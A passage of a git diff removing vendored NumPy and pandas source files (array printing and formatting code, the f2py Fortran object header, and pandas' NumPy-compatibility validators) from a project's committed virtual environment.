- if show_summary: - s, line = _extendLine( - s, line, summary_insert, elem_width, hanging_indent, legacy) - if legacy <= 113: - line += ", " - else: - line += separator - - for i in range(trailing_items, 1, -1): - word = recurser(index + (-i,), next_hanging_indent, next_width) - s, line = _extendLine_pretty( - s, line, word, elem_width, hanging_indent, legacy) - line += separator - - if legacy <= 113: - # width of the separator is not considered on 1.13 - elem_width = curr_width - word = recurser(index + (-1,), next_hanging_indent, next_width) - s, line = _extendLine_pretty( - s, line, word, elem_width, hanging_indent, legacy) - - s += line - - # other axes - insert newlines between rows - else: - s = '' - line_sep = separator.rstrip() + '\n'*(axes_left - 1) - - for i in range(leading_items): - nested = recurser(index + (i,), next_hanging_indent, next_width) - s += hanging_indent + nested + line_sep - - if show_summary: - if legacy <= 113: - # trailing space, fixed nbr of newlines, and fixed separator - s += hanging_indent + summary_insert + ", \n" - else: - s += hanging_indent + summary_insert + line_sep - - for i in range(trailing_items, 1, -1): - nested = recurser(index + (-i,), next_hanging_indent, - next_width) - s += hanging_indent + nested + line_sep - - nested = recurser(index + (-1,), next_hanging_indent, next_width) - s += hanging_indent + nested - - # remove the hanging indent, and wrap in [] - s = '[' + s[len(hanging_indent):] + ']' - return s - - try: - # invoke the recursive part with an initial index and prefix - return recurser(index=(), - hanging_indent=next_line_prefix, - curr_width=line_width) - finally: - # recursive closures have a cyclic reference to themselves, which - # requires gc to collect (gh-10620). To avoid this problem, for - # performance and PyPy friendliness, we break the cycle: - recurser = None - -def _none_or_positive_arg(x, name): - if x is None: - return -1 - if x < 0: - raise ValueError("{} must be >= 0".format(name)) - return x - -class FloatingFormat: - """ Formatter for subtypes of np.floating """ - def __init__(self, data, precision, floatmode, suppress_small, sign=False, - *, legacy=None): - # for backcompatibility, accept bools - if isinstance(sign, bool): - sign = '+' if sign else '-' - - self._legacy = legacy - if self._legacy <= 113: - # when not 0d, legacy does not support '-' - if data.shape != () and sign == '-': - sign = ' ' - - self.floatmode = floatmode - if floatmode == 'unique': - self.precision = None - else: - self.precision = precision - - self.precision = _none_or_positive_arg(self.precision, 'precision') - - self.suppress_small = suppress_small - self.sign = sign - self.exp_format = False - self.large_exponent = False - - self.fillFormat(data) - - def fillFormat(self, data): - # only the finite values are used to compute the number of digits - finite_vals = data[isfinite(data)] - - # choose exponential mode based on the non-zero finite values: - abs_non_zero = absolute(finite_vals[finite_vals != 0]) - if len(abs_non_zero) != 0: - max_val = np.max(abs_non_zero) - min_val = np.min(abs_non_zero) - with errstate(over='ignore'): # division can overflow - if max_val >= 1.e8 or (not self.suppress_small and - (min_val < 0.0001 or max_val/min_val > 1000.)): - self.exp_format = True - - # do a first pass of printing all the numbers, to determine sizes - if len(finite_vals) == 0: - self.pad_left = 0 - self.pad_right = 0 - self.trim = '.' - self.exp_size = -1 - self.unique = True - self.min_digits = None - elif self.exp_format: - trim, unique = '.', True - if self.floatmode == 'fixed' or self._legacy <= 113: - trim, unique = 'k', False - strs = (dragon4_scientific(x, precision=self.precision, - unique=unique, trim=trim, sign=self.sign == '+') - for x in finite_vals) - frac_strs, _, exp_strs = zip(*(s.partition('e') for s in strs)) - int_part, frac_part = zip(*(s.split('.') for s in frac_strs)) - self.exp_size = max(len(s) for s in exp_strs) - 1 - - self.trim = 'k' - self.precision = max(len(s) for s in frac_part) - self.min_digits = self.precision - self.unique = unique - - # for back-compat with np 1.13, use 2 spaces & sign and full prec - if self._legacy <= 113: - self.pad_left = 3 - else: - # this should be only 1 or 2. Can be calculated from sign. - self.pad_left = max(len(s) for s in int_part) - # pad_right is only needed for nan length calculation - self.pad_right = self.exp_size + 2 + self.precision - else: - trim, unique = '.', True - if self.floatmode == 'fixed': - trim, unique = 'k', False - strs = (dragon4_positional(x, precision=self.precision, - fractional=True, - unique=unique, trim=trim, - sign=self.sign == '+') - for x in finite_vals) - int_part, frac_part = zip(*(s.split('.') for s in strs)) - if self._legacy <= 113: - self.pad_left = 1 + max(len(s.lstrip('-+')) for s in int_part) - else: - self.pad_left = max(len(s) for s in int_part) - self.pad_right = max(len(s) for s in frac_part) - self.exp_size = -1 - self.unique = unique - - if self.floatmode in ['fixed', 'maxprec_equal']: - self.precision = self.min_digits = self.pad_right - self.trim = 'k' - else: - self.trim = '.' - self.min_digits = 0 - - if self._legacy > 113: - # account for sign = ' ' by adding one to pad_left - if self.sign == ' ' and not any(np.signbit(finite_vals)): - self.pad_left += 1 - - # if there are non-finite values, may need to increase pad_left - if data.size != finite_vals.size: - neginf = self.sign != '-' or any(data[isinf(data)] < 0) - nanlen = len(_format_options['nanstr']) - inflen = len(_format_options['infstr']) + neginf - offset = self.pad_right + 1 # +1 for decimal pt - self.pad_left = max(self.pad_left, nanlen - offset, inflen - offset) - - def __call__(self, x): - if not np.isfinite(x): - with errstate(invalid='ignore'): - if np.isnan(x): - sign = '+' if self.sign == '+' else '' - ret = sign + _format_options['nanstr'] - else: # isinf - sign = '-' if x < 0 else '+' if self.sign == '+' else '' - ret = sign + _format_options['infstr'] - return ' '*(self.pad_left + self.pad_right + 1 - len(ret)) + ret - - if self.exp_format: - return dragon4_scientific(x, - precision=self.precision, - min_digits=self.min_digits, - unique=self.unique, - trim=self.trim, - sign=self.sign == '+', - pad_left=self.pad_left, - exp_digits=self.exp_size) - else: - return dragon4_positional(x, - precision=self.precision, - min_digits=self.min_digits, - unique=self.unique, - fractional=True, - trim=self.trim, - sign=self.sign == '+', - pad_left=self.pad_left, - pad_right=self.pad_right) - - -@set_module('numpy') -def format_float_scientific(x, precision=None, unique=True, trim='k', - sign=False, pad_left=None, exp_digits=None, - min_digits=None): - """ - Format a floating-point scalar as a decimal string in scientific notation. - - Provides control over rounding, trimming and padding. Uses and assumes - IEEE unbiased rounding. Uses the "Dragon4" algorithm. - - Parameters - ---------- - x : python float or numpy floating scalar - Value to format. - precision : non-negative integer or None, optional - Maximum number of digits to print. May be None if `unique` is - `True`, but must be an integer if unique is `False`. - unique : boolean, optional - If `True`, use a digit-generation strategy which gives the shortest - representation which uniquely identifies the floating-point number from - other values of the same type, by judicious rounding. If `precision` - is given fewer digits than necessary can be printed. If `min_digits` - is given more can be printed, in which cases the last digit is rounded - with unbiased rounding. - If `False`, digits are generated as if printing an infinite-precision - value and stopping after `precision` digits, rounding the remaining - value with unbiased rounding - trim : one of 'k', '.', '0', '-', optional - Controls post-processing trimming of trailing digits, as follows: - - * 'k' : keep trailing zeros, keep decimal point (no trimming) - * '.' : trim all trailing zeros, leave decimal point - * '0' : trim all but the zero before the decimal point. Insert the - zero if it is missing. - * '-' : trim trailing zeros and any trailing decimal point - sign : boolean, optional - Whether to show the sign for positive values. - pad_left : non-negative integer, optional - Pad the left side of the string with whitespace until at least that - many characters are to the left of the decimal point. - exp_digits : non-negative integer, optional - Pad the exponent with zeros until it contains at least this many digits. - If omitted, the exponent will be at least 2 digits. - min_digits : non-negative integer or None, optional - Minimum number of digits to print. This only has an effect for - `unique=True`. In that case more digits than necessary to uniquely - identify the value may be printed and rounded unbiased. - - -- versionadded:: 1.21.0 - - Returns - ------- - rep : string - The string representation of the floating point value - - See Also - -------- - format_float_positional - - Examples - -------- - >>> np.format_float_scientific(np.float32(np.pi)) - '3.1415927e+00' - >>> s = np.float32(1.23e24) - >>> np.format_float_scientific(s, unique=False, precision=15) - '1.230000071797338e+24' - >>> np.format_float_scientific(s, exp_digits=4) - '1.23e+0024' - """ - precision = _none_or_positive_arg(precision, 'precision') - pad_left = _none_or_positive_arg(pad_left, 'pad_left') - exp_digits = _none_or_positive_arg(exp_digits, 'exp_digits') - min_digits = _none_or_positive_arg(min_digits, 'min_digits') - if min_digits > 0 and precision > 0 and min_digits > precision: - raise ValueError("min_digits must be less than or equal to precision") - return dragon4_scientific(x, precision=precision, unique=unique, - trim=trim, sign=sign, pad_left=pad_left, - exp_digits=exp_digits, min_digits=min_digits) - - -@set_module('numpy') -def format_float_positional(x, precision=None, unique=True, - fractional=True, trim='k', sign=False, - pad_left=None, pad_right=None, min_digits=None): - """ - Format a floating-point scalar as a decimal string in positional notation. - - Provides control over rounding, trimming and padding. Uses and assumes - IEEE unbiased rounding. Uses the "Dragon4" algorithm. - - Parameters - ---------- - x : python float or numpy floating scalar - Value to format. - precision : non-negative integer or None, optional - Maximum number of digits to print. May be None if `unique` is - `True`, but must be an integer if unique is `False`. - unique : boolean, optional - If `True`, use a digit-generation strategy which gives the shortest - representation which uniquely identifies the floating-point number from - other values of the same type, by judicious rounding. If `precision` - is given fewer digits than necessary can be printed, or if `min_digits` - is given more can be printed, in which cases the last digit is rounded - with unbiased rounding. - If `False`, digits are generated as if printing an infinite-precision - value and stopping after `precision` digits, rounding the remaining - value with unbiased rounding - fractional : boolean, optional - If `True`, the cutoffs of `precision` and `min_digits` refer to the - total number of digits after the decimal point, including leading - zeros. - If `False`, `precision` and `min_digits` refer to the total number of - significant digits, before or after the decimal point, ignoring leading - zeros. - trim : one of 'k', '.', '0', '-', optional - Controls post-processing trimming of trailing digits, as follows: - - * 'k' : keep trailing zeros, keep decimal point (no trimming) - * '.' : trim all trailing zeros, leave decimal point - * '0' : trim all but the zero before the decimal point. Insert the - zero if it is missing. - * '-' : trim trailing zeros and any trailing decimal point - sign : boolean, optional - Whether to show the sign for positive values. - pad_left : non-negative integer, optional - Pad the left side of the string with whitespace until at least that - many characters are to the left of the decimal point. - pad_right : non-negative integer, optional - Pad the right side of the string with whitespace until at least that - many characters are to the right of the decimal point. - min_digits : non-negative integer or None, optional - Minimum number of digits to print. Only has an effect if `unique=True` - in which case additional digits past those necessary to uniquely - identify the value may be printed, rounding the last additional digit. - - -- versionadded:: 1.21.0 - - Returns - ------- - rep : string - The string representation of the floating point value - - See Also - -------- - format_float_scientific - - Examples - -------- - >>> np.format_float_positional(np.float32(np.pi)) - '3.1415927' - >>> np.format_float_positional(np.float16(np.pi)) - '3.14' - >>> np.format_float_positional(np.float16(0.3)) - '0.3' - >>> np.format_float_positional(np.float16(0.3), unique=False, precision=10) - '0.3000488281' - """ - precision = _none_or_positive_arg(precision, 'precision') - pad_left = _none_or_positive_arg(pad_left, 'pad_left') - pad_right = _none_or_positive_arg(pad_right, 'pad_right') - min_digits = _none_or_positive_arg(min_digits, 'min_digits') - if not fractional and precision == 0: - raise ValueError("precision must be greater than 0 if " - "fractional=False") - if min_digits > 0 and precision > 0 and min_digits > precision: - raise ValueError("min_digits must be less than or equal to precision") - return dragon4_positional(x, precision=precision, unique=unique, - fractional=fractional, trim=trim, - sign=sign, pad_left=pad_left, - pad_right=pad_right, min_digits=min_digits) - - -class IntegerFormat: - def __init__(self, data): - if data.size > 0: - max_str_len = max(len(str(np.max(data))), - len(str(np.min(data)))) - else: - max_str_len = 0 - self.format = '%{}d'.format(max_str_len) - - def __call__(self, x): - return self.format % x - - -class BoolFormat: - def __init__(self, data, **kwargs): - # add an extra space so " True" and "False" have the same length and - # array elements align nicely when printed, except in 0d arrays - self.truestr = ' True' if data.shape != () else 'True' - - def __call__(self, x): - return self.truestr if x else "False" - - -class ComplexFloatingFormat: - """ Formatter for subtypes of np.complexfloating """ - def __init__(self, x, precision, floatmode, suppress_small, - sign=False, *, legacy=None): - # for backcompatibility, accept bools - if isinstance(sign, bool): - sign = '+' if sign else '-' - - floatmode_real = floatmode_imag = floatmode - if legacy <= 113: - floatmode_real = 'maxprec_equal' - floatmode_imag = 'maxprec' - - self.real_format = FloatingFormat( - x.real, precision, floatmode_real, suppress_small, - sign=sign, legacy=legacy - ) - self.imag_format = FloatingFormat( - x.imag, precision, floatmode_imag, suppress_small, - sign='+', legacy=legacy - ) - - def __call__(self, x): - r = self.real_format(x.real) - i = self.imag_format(x.imag) - - # add the 'j' before the terminal whitespace in i - sp = len(i.rstrip()) - i = i[:sp] + 'j' + i[sp:] - - return r + i - - -class _TimelikeFormat: - def __init__(self, data): - non_nat = data[~isnat(data)] - if len(non_nat) > 0: - # Max str length of non-NaT elements - max_str_len = max(len(self._format_non_nat(np.max(non_nat))), - len(self._format_non_nat(np.min(non_nat)))) - else: - max_str_len = 0 - if len(non_nat) < data.size: - # data contains a NaT - max_str_len = max(max_str_len, 5) - self._format = '%{}s'.format(max_str_len) - self._nat = "'NaT'".rjust(max_str_len) - - def _format_non_nat(self, x): - # override in subclass - raise NotImplementedError - - def __call__(self, x): - if isnat(x): - return self._nat - else: - return self._format % self._format_non_nat(x) - - -class DatetimeFormat(_TimelikeFormat): - def __init__(self, x, unit=None, timezone=None, casting='same_kind', - legacy=False): - # Get the unit from the dtype - if unit is None: - if x.dtype.kind == 'M': - unit = datetime_data(x.dtype)[0] - else: - unit = 's' - - if timezone is None: - timezone = 'naive' - self.timezone = timezone - self.unit = unit - self.casting = casting - self.legacy = legacy - - # must be called after the above are configured - super().__init__(x) - - def __call__(self, x): - if self.legacy <= 113: - return self._format_non_nat(x) - return super().__call__(x) - - def _format_non_nat(self, x): - return "'%s'" % datetime_as_string(x, - unit=self.unit, - timezone=self.timezone, - casting=self.casting) - - -class TimedeltaFormat(_TimelikeFormat): - def _format_non_nat(self, x): - return str(x.astype('i8')) - - -class SubArrayFormat: - def __init__(self, format_function, **options): - self.format_function = format_function - self.threshold = options['threshold'] - self.edge_items = options['edgeitems'] - - def __call__(self, a): - self.summary_insert = "..." if a.size > self.threshold else "" - return self.format_array(a) - - def format_array(self, a): - if np.ndim(a) == 0: - return self.format_function(a) - - if self.summary_insert and a.shape[0] > 2*self.edge_items: - formatted = ( - [self.format_array(a_) for a_ in a[:self.edge_items]] - + [self.summary_insert] - + [self.format_array(a_) for a_ in a[-self.edge_items:]] - ) - else: - formatted = [self.format_array(a_) for a_ in a] - - return "[" + ", ".join(formatted) + "]" - - -class StructuredVoidFormat: - """ - Formatter for structured np.void objects. - - This does not work on structured alias types like np.dtype(('i4', 'i2,i2')), - as alias scalars lose their field information, and the implementation - relies upon np.void.__getitem__. - """ - def __init__(self, format_functions): - self.format_functions = format_functions - - @classmethod - def from_data(cls, data, **options): - """ - This is a second way to initialize StructuredVoidFormat, using the raw data - as input. Added to avoid changing the signature of __init__. - """ - format_functions = [] - for field_name in data.dtype.names: - format_function = _get_format_function(data[field_name], **options) - if data.dtype[field_name].shape != (): - format_function = SubArrayFormat(format_function, **options) - format_functions.append(format_function) - return cls(format_functions) - - def __call__(self, x): - str_fields = [ - format_function(field) - for field, format_function in zip(x, self.format_functions) - ] - if len(str_fields) == 1: - return "({},)".format(str_fields[0]) - else: - return "({})".format(", ".join(str_fields)) - - -def _void_scalar_repr(x): - """ - Implements the repr for structured-void scalars. It is called from the - scalartypes.c.src code, and is placed here because it uses the elementwise - formatters defined above. - """ - return StructuredVoidFormat.from_data(array(x), **_format_options)(x) - - -_typelessdata = [int_, float_, complex_, bool_] - - -def dtype_is_implied(dtype): - """ - Determine if the given dtype is implied by the representation of its values. - - Parameters - ---------- - dtype : dtype - Data type - - Returns - ------- - implied : bool - True if the dtype is implied by the representation of its values. - - Examples - -------- - >>> np.core.arrayprint.dtype_is_implied(int) - True - >>> np.array([1, 2, 3], int) - array([1, 2, 3]) - >>> np.core.arrayprint.dtype_is_implied(np.int8) - False - >>> np.array([1, 2, 3], np.int8) - array([1, 2, 3], dtype=int8) - """ - dtype = np.dtype(dtype) - if _format_options['legacy'] <= 113 and dtype.type == bool_: - return False - - # not just void types can be structured, and names are not part of the repr - if dtype.names is not None: - return False - - # should care about endianness *unless size is 1* (e.g., int8, bool) - if not dtype.isnative: - return False - - return dtype.type in _typelessdata - - -def dtype_short_repr(dtype): - """ - Convert a dtype to a short form which evaluates to the same dtype. - - The intent is roughly that the following holds - - >>> from numpy import * - >>> dt = np.int64([1, 2]).dtype - >>> assert eval(dtype_short_repr(dt)) == dt - """ - if type(dtype).__repr__ != np.dtype.__repr__: - # TODO: Custom repr for user DTypes, logic should likely move. - return repr(dtype) - if dtype.names is not None: - # structured dtypes give a list or tuple repr - return str(dtype) - elif issubclass(dtype.type, flexible): - # handle these separately so they don't give garbage like str256 - return "'%s'" % str(dtype) - - typename = dtype.name - if not dtype.isnative: - # deal with cases like dtype(' 0 - - prefix = class_name + "(" - suffix = ")" if skipdtype else "," - - if (_format_options['legacy'] <= 113 and - arr.shape == () and not arr.dtype.names): - lst = repr(arr.item()) - elif arr.size > 0 or arr.shape == (0,): - lst = array2string(arr, max_line_width, precision, suppress_small, - ', ', prefix, suffix=suffix) - else: # show zero-length shape unless it is (0,) - lst = "[], shape=%s" % (repr(arr.shape),) - - arr_str = prefix + lst + suffix - - if skipdtype: - return arr_str - - dtype_str = "dtype={})".format(dtype_short_repr(arr.dtype)) - - # compute whether we should put dtype on a new line: Do so if adding the - # dtype would extend the last line past max_line_width. - # Note: This line gives the correct result even when rfind returns -1. - last_line_len = len(arr_str) - (arr_str.rfind('\n') + 1) - spacer = " " - if _format_options['legacy'] <= 113: - if issubclass(arr.dtype.type, flexible): - spacer = '\n' + ' '*len(class_name + "(") - elif last_line_len + len(dtype_str) + 1 > max_line_width: - spacer = '\n' + ' '*len(class_name + "(") - - return arr_str + spacer + dtype_str - - -def _array_repr_dispatcher( - arr, max_line_width=None, precision=None, suppress_small=None): - return (arr,) - - -@array_function_dispatch(_array_repr_dispatcher, module='numpy') -def array_repr(arr, max_line_width=None, precision=None, suppress_small=None): - """ - Return the string representation of an array. - - Parameters - ---------- - arr : ndarray - Input array. - max_line_width : int, optional - Inserts newlines if text is longer than `max_line_width`. - Defaults to ``numpy.get_printoptions()['linewidth']``. - precision : int, optional - Floating point precision. - Defaults to ``numpy.get_printoptions()['precision']``. - suppress_small : bool, optional - Represent numbers "very close" to zero as zero; default is False. - Very close is defined by precision: if the precision is 8, e.g., - numbers smaller (in absolute value) than 5e-9 are represented as - zero. - Defaults to ``numpy.get_printoptions()['suppress']``. - - Returns - ------- - string : str - The string representation of an array. - - See Also - -------- - array_str, array2string, set_printoptions - - Examples - -------- - >>> np.array_repr(np.array([1,2])) - 'array([1, 2])' - >>> np.array_repr(np.ma.array([0.])) - 'MaskedArray([0.])' - >>> np.array_repr(np.array([], np.int32)) - 'array([], dtype=int32)' - - >>> x = np.array([1e-6, 4e-7, 2, 3]) - >>> np.array_repr(x, precision=6, suppress_small=True) - 'array([0.000001, 0. , 2. , 3. ])' - - """ - return _array_repr_implementation( - arr, max_line_width, precision, suppress_small) - - -@_recursive_guard() -def _guarded_repr_or_str(v): - if isinstance(v, bytes): - return repr(v) - return str(v) - - -def _array_str_implementation( - a, max_line_width=None, precision=None, suppress_small=None, - array2string=array2string): - """Internal version of array_str() that allows overriding array2string.""" - if (_format_options['legacy'] <= 113 and - a.shape == () and not a.dtype.names): - return str(a.item()) - - # the str of 0d arrays is a special case: It should appear like a scalar, - # so floats are not truncated by `precision`, and strings are not wrapped - # in quotes. So we return the str of the scalar value. - if a.shape == (): - # obtain a scalar and call str on it, avoiding problems for subclasses - # for which indexing with () returns a 0d instead of a scalar by using - # ndarray's getindex. Also guard against recursive 0d object arrays. - return _guarded_repr_or_str(np.ndarray.__getitem__(a, ())) - - return array2string(a, max_line_width, precision, suppress_small, ' ', "") - - -def _array_str_dispatcher( - a, max_line_width=None, precision=None, suppress_small=None): - return (a,) - - -@array_function_dispatch(_array_str_dispatcher, module='numpy') -def array_str(a, max_line_width=None, precision=None, suppress_small=None): - """ - Return a string representation of the data in an array. - - The data in the array is returned as a single string. This function is - similar to `array_repr`, the difference being that `array_repr` also - returns information on the kind of array and its data type. - - Parameters - ---------- - a : ndarray - Input array. - max_line_width : int, optional - Inserts newlines if text is longer than `max_line_width`. - Defaults to ``numpy.get_printoptions()['linewidth']``. - precision : int, optional - Floating point precision. - Defaults to ``numpy.get_printoptions()['precision']``. - suppress_small : bool, optional - Represent numbers "very close" to zero as zero; default is False. - Very close is defined by precision: if the precision is 8, e.g., - numbers smaller (in absolute value) than 5e-9 are represented as - zero. - Defaults to ``numpy.get_printoptions()['suppress']``. - - See Also - -------- - array2string, array_repr, set_printoptions - - Examples - -------- - >>> np.array_str(np.arange(3)) - '[0 1 2]' - - """ - return _array_str_implementation( - a, max_line_width, precision, suppress_small) - - -# needed if __array_function__ is disabled -_array2string_impl = getattr(array2string, '__wrapped__', array2string) -_default_array_str = functools.partial(_array_str_implementation, - array2string=_array2string_impl) -_default_array_repr = functools.partial(_array_repr_implementation, - array2string=_array2string_impl) - - -def set_string_function(f, repr=True): - """ - Set a Python function to be used when pretty printing arrays. - - Parameters - ---------- - f : function or None - Function to be used to pretty print arrays. The function should expect - a single array argument and return a string of the representation of - the array. If None, the function is reset to the default NumPy function - to print arrays. - repr : bool, optional - If True (default), the function for pretty printing (``__repr__``) - is set, if False the function that returns the default string - representation (``__str__``) is set. - - See Also - -------- - set_printoptions, get_printoptions - - Examples - -------- - >>> def pprint(arr): - ... return 'HA! - What are you going to do now?' - ... - >>> np.set_string_function(pprint) - >>> a = np.arange(10) - >>> a - HA! - What are you going to do now? - >>> _ = a - >>> # [0 1 2 3 4 5 6 7 8 9] - - We can reset the function to the default: - - >>> np.set_string_function(None) - >>> a - array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) - - `repr` affects either pretty printing or normal string representation. - Note that ``__repr__`` is still affected by setting ``__str__`` - because the width of each array element in the returned string becomes - equal to the length of the result of ``__str__()``. - - >>> x = np.arange(4) - >>> np.set_string_function(lambda x:'random', repr=False) - >>> x.__str__() - 'random' - >>> x.__repr__() - 'array([0, 1, 2, 3])' - - """ - if f is None: - if repr: - return multiarray.set_string_function(_default_array_repr, 1) - else: - return multiarray.set_string_function(_default_array_str, 0) - else: - return multiarray.set_string_function(f, repr) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/f2py/src/fortranobject.h b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/f2py/src/fortranobject.h deleted file mode 100644 index abd699c2fe8615c1417a6d58d83937d097867d40..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/f2py/src/fortranobject.h +++ /dev/null @@ -1,173 +0,0 @@ -#ifndef Py_FORTRANOBJECT_H -#define Py_FORTRANOBJECT_H -#ifdef __cplusplus -extern "C" { -#endif - -#include - -#ifndef NPY_NO_DEPRECATED_API -#define NPY_NO_DEPRECATED_API NPY_API_VERSION -#endif -#ifdef FORTRANOBJECT_C -#define NO_IMPORT_ARRAY -#endif -#define PY_ARRAY_UNIQUE_SYMBOL _npy_f2py_ARRAY_API -#include "numpy/arrayobject.h" -#include "numpy/npy_3kcompat.h" - -#ifdef F2PY_REPORT_ATEXIT -#include -// clang-format off -extern void f2py_start_clock(void); -extern void f2py_stop_clock(void); -extern void f2py_start_call_clock(void); -extern void f2py_stop_call_clock(void); -extern void f2py_cb_start_clock(void); -extern void f2py_cb_stop_clock(void); -extern void f2py_cb_start_call_clock(void); -extern void f2py_cb_stop_call_clock(void); -extern void f2py_report_on_exit(int, void *); -// clang-format on -#endif - -#ifdef DMALLOC -#include "dmalloc.h" -#endif - -/* Fortran object interface */ - -/* -123456789-123456789-123456789-123456789-123456789-123456789-123456789-12 - -PyFortranObject represents various Fortran objects: -Fortran (module) routines, COMMON blocks, module data. - -Author: Pearu Peterson -*/ - -#define F2PY_MAX_DIMS 40 -#define F2PY_MESSAGE_BUFFER_SIZE 300 // Increase on "stack smashing detected" - -typedef void (*f2py_set_data_func)(char *, npy_intp *); -typedef void (*f2py_void_func)(void); -typedef void (*f2py_init_func)(int *, npy_intp *, f2py_set_data_func, int *); - -/*typedef void* (*f2py_c_func)(void*,...);*/ - -typedef void *(*f2pycfunc)(void); - -typedef struct { - char *name; /* attribute (array||routine) name */ - int rank; /* array rank, 0 for scalar, max is F2PY_MAX_DIMS, - || rank=-1 for Fortran routine */ - struct { - npy_intp d[F2PY_MAX_DIMS]; - } dims; /* dimensions of the array, || not used */ - int type; /* PyArray_ || not used */ - int elsize; /* Element size || not used */ - char *data; /* pointer to array || Fortran routine */ - f2py_init_func func; /* initialization function for - allocatable arrays: - func(&rank,dims,set_ptr_func,name,len(name)) - || C/API wrapper for Fortran routine */ - char *doc; /* documentation string; only recommended - for routines. */ -} FortranDataDef; - -typedef struct { - PyObject_HEAD - int len; /* Number of attributes */ - FortranDataDef *defs; /* An array of FortranDataDef's */ - PyObject *dict; /* Fortran object attribute dictionary */ -} PyFortranObject; - -#define PyFortran_Check(op) (Py_TYPE(op) == &PyFortran_Type) -#define PyFortran_Check1(op) (0 == strcmp(Py_TYPE(op)->tp_name, "fortran")) - -extern PyTypeObject PyFortran_Type; -extern int -F2PyDict_SetItemString(PyObject *dict, char *name, PyObject *obj); -extern PyObject * -PyFortranObject_New(FortranDataDef *defs, f2py_void_func init); -extern PyObject * -PyFortranObject_NewAsAttr(FortranDataDef *defs); - -PyObject * -F2PyCapsule_FromVoidPtr(void *ptr, void (*dtor)(PyObject *)); -void * -F2PyCapsule_AsVoidPtr(PyObject *obj); -int -F2PyCapsule_Check(PyObject *ptr); - -extern void * -F2PySwapThreadLocalCallbackPtr(char *key, void *ptr); -extern void * -F2PyGetThreadLocalCallbackPtr(char *key); - -#define ISCONTIGUOUS(m) (PyArray_FLAGS(m) & NPY_ARRAY_C_CONTIGUOUS) -#define F2PY_INTENT_IN 1 -#define F2PY_INTENT_INOUT 2 -#define F2PY_INTENT_OUT 4 -#define F2PY_INTENT_HIDE 8 -#define F2PY_INTENT_CACHE 16 -#define F2PY_INTENT_COPY 32 -#define F2PY_INTENT_C 64 -#define F2PY_OPTIONAL 128 -#define F2PY_INTENT_INPLACE 256 -#define F2PY_INTENT_ALIGNED4 512 -#define F2PY_INTENT_ALIGNED8 1024 -#define F2PY_INTENT_ALIGNED16 2048 - -#define ARRAY_ISALIGNED(ARR, SIZE) ((size_t)(PyArray_DATA(ARR)) % (SIZE) == 0) -#define F2PY_ALIGN4(intent) (intent & F2PY_INTENT_ALIGNED4) -#define F2PY_ALIGN8(intent) (intent & F2PY_INTENT_ALIGNED8) -#define F2PY_ALIGN16(intent) (intent & F2PY_INTENT_ALIGNED16) - -#define F2PY_GET_ALIGNMENT(intent) \ - (F2PY_ALIGN4(intent) \ - ? 4 \ - : (F2PY_ALIGN8(intent) ? 8 : (F2PY_ALIGN16(intent) ? 16 : 1))) -#define F2PY_CHECK_ALIGNMENT(arr, intent) \ - ARRAY_ISALIGNED(arr, F2PY_GET_ALIGNMENT(intent)) -#define F2PY_ARRAY_IS_CHARACTER_COMPATIBLE(arr) ((PyArray_DESCR(arr)->type_num == NPY_STRING && PyArray_DESCR(arr)->elsize >= 1) \ - || PyArray_DESCR(arr)->type_num == NPY_UINT8) -#define F2PY_IS_UNICODE_ARRAY(arr) (PyArray_DESCR(arr)->type_num == NPY_UNICODE) - -extern PyArrayObject * -ndarray_from_pyobj(const int type_num, const int elsize_, npy_intp *dims, - const int rank, const int intent, PyObject *obj, - const char *errmess); - -extern PyArrayObject * -array_from_pyobj(const int type_num, npy_intp *dims, const int rank, - const int intent, PyObject *obj); -extern int -copy_ND_array(const PyArrayObject *in, PyArrayObject *out); - -#ifdef DEBUG_COPY_ND_ARRAY -extern void -dump_attrs(const PyArrayObject *arr); -#endif - - extern int f2py_describe(PyObject *obj, char *buf); - - /* Utility CPP macros and functions that can be used in signature file - expressions. See signature-file.rst for documentation. - */ - -#define f2py_itemsize(var) (PyArray_DESCR((capi_ ## var ## _as_array))->elsize) -#define f2py_size(var, ...) f2py_size_impl((PyArrayObject *)(capi_ ## var ## _as_array), ## __VA_ARGS__, -1) -#define f2py_rank(var) var ## _Rank -#define f2py_shape(var,dim) var ## _Dims[dim] -#define f2py_len(var) f2py_shape(var,0) -#define f2py_fshape(var,dim) f2py_shape(var,rank(var)-dim-1) -#define f2py_flen(var) f2py_fshape(var,0) -#define f2py_slen(var) capi_ ## var ## _len - - extern npy_intp f2py_size_impl(PyArrayObject* var, ...); - -#ifdef __cplusplus -} -#endif -#endif /* !Py_FORTRANOBJECT_H */ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/compat/numpy/function.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/compat/numpy/function.py deleted file mode 100644 index a36e25a9df410aae54c11ee267532620b3855974..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/compat/numpy/function.py +++ /dev/null @@ -1,416 +0,0 @@ -""" -For compatibility with numpy libraries, pandas functions or methods have to -accept '*args' and '**kwargs' parameters to accommodate numpy arguments that -are not actually used or respected in the pandas implementation. - -To ensure that users do not abuse these parameters, validation is performed in -'validators.py' to make sure that any extra parameters passed correspond ONLY -to those in the numpy signature. Part of that validation includes whether or -not the user attempted to pass in non-default values for these extraneous -parameters. As we want to discourage users from relying on these parameters -when calling the pandas implementation, we want them only to pass in the -default values for these parameters. - -This module provides a set of commonly used default arguments for functions and -methods that are spread throughout the codebase. This module will make it -easier to adjust to future upstream changes in the analogous numpy signatures. -""" -from __future__ import annotations - -from typing import ( - TYPE_CHECKING, - Any, - TypeVar, - cast, - overload, -) - -import numpy as np -from numpy import ndarray - -from pandas._libs.lib import ( - is_bool, - is_integer, -) -from pandas.errors import UnsupportedFunctionCall -from pandas.util._validators import ( - validate_args, - validate_args_and_kwargs, - validate_kwargs, -) - -if TYPE_CHECKING: - from pandas._typing import ( - Axis, - AxisInt, - ) - - AxisNoneT = TypeVar("AxisNoneT", Axis, None) - - -class CompatValidator: - def __init__( - self, - defaults, - fname=None, - method: str | None = None, - max_fname_arg_count=None, - ) -> None: - self.fname = fname - self.method = method - self.defaults = defaults - self.max_fname_arg_count = max_fname_arg_count - - def __call__( - self, - args, - kwargs, - fname=None, - max_fname_arg_count=None, - method: str | None = None, - ) 